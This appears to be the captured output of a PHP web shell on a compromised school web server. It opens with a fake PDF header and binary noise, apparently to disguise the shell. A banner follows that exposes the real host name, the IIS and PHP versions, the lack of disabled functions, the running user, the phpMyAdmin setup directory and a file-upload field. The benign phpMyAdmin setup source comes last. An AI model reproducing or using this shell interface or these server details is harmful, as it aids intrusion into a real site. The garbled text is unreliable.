%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : www.kowitt.ac.th / Your IP : 216.73.216.118 Web Server : Microsoft-IIS/7.5 System : Windows NT SERVER02 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586 User : IUSR ( 0) PHP Version : 5.6.31 Disable Function : NONE MySQL : ON | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/BK/wwwroot/phpMyAdmin/setup/ |
Upload File : |
<?php /* vim: set expandtab sw=4 ts=4 sts=4: */ /** * Front controller for setup script * * @package PhpMyAdmin-Setup * @license http://www.gnu.org/licenses/gpl.html GNU GPL 2.0 */ /** * Core libraries. */ require './lib/common.inc.php'; $page = PMA_isValid($_GET['page'], 'scalar') ? $_GET['page'] : null; $page = preg_replace('/[^a-z]/', '', $page); if ($page === '') { $page = 'index'; } if (!file_exists("./setup/frames/$page.inc.php")) { // it will happen only when entering URL by hand, we don't care for these cases PMA_fatalError(__('Wrong GET file attribute value')); } // Handle done action info $action_done = PMA_isValid($_GET['action_done'], 'scalar') ? $_GET['action_done'] : null; $action_done = preg_replace('/[^a-z_]/', '', $action_done); PMA_noCacheHeader(); ?> <!DOCTYPE HTML> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta charset="utf-8" /> <title>phpMyAdmin setup</title> <link href="../favicon.ico" rel="icon" type="image/x-icon" /> <link href="../favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link href="styles.css" rel="stylesheet" type="text/css" /> <script type="text/javascript" src="../js/jquery/jquery-2.1.4.min.js"></script> <script type="text/javascript" src="../js/jquery/jquery-ui-1.11.4.min.js"> </script> <script type="text/javascript" src="ajax.js"></script> <script type="text/javascript" src="../js/config.js"></script> <script type="text/javascript" src="scripts.js"></script> <script type="text/javascript" src="../js/messages.php"></script> </head> <body> <h1><span class="blue">php</span><span class="orange">MyAdmin</span> setup</h1> <div id="menu"> <?php require './setup/frames/menu.inc.php'; ?> </div> <div id="page"> <?php require "./setup/frames/$page.inc.php"; ?> </div> </body> </html>